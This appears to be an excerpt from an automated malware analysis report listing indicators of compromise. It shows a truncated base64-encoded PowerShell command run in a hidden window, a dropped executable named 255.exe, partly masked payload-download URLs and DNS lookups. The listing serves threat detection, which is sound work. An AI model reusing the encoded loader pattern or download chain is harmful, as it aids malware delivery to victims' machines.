Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAVQBzAHgAdABwAGkAaQBjAHUAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8ATwB5AG0AdQB5AGsAYgB6AGkAdwBmACAAIwA+ACAAJABCAGQAZQB0AGQAbAB4AHYAeABxAD0AJwBJAG8AdgBlA...
- %HOMEPATH%\255.exe
- %HOMEPATH%\255.exe
- http://ne#.######eticsliteracyproject.org/wp-includes/g9CeZ/
- http://mo######ri.stchriskb.org/l/gc7/
- DNS ASK al####chbd-info.com
- DNS ASK bl#####in.forumias.com
- DNS ASK ne#.######eticsliteracyproject.org
- DNS ASK mo######ri.stchriskb.org
- DNS ASK te##.##linesunlight.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAVQBzAHgAdABwAGkAaQBjAHUAIABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8ATwB5AG0AdQB5AGsAYgB6AGkAdwBmACAAIwA+ACAAJABCAGQAZQB0AGQAbAB4AHYAeABxAD0AJwBJAG8AdgBlA...' (with hidden window)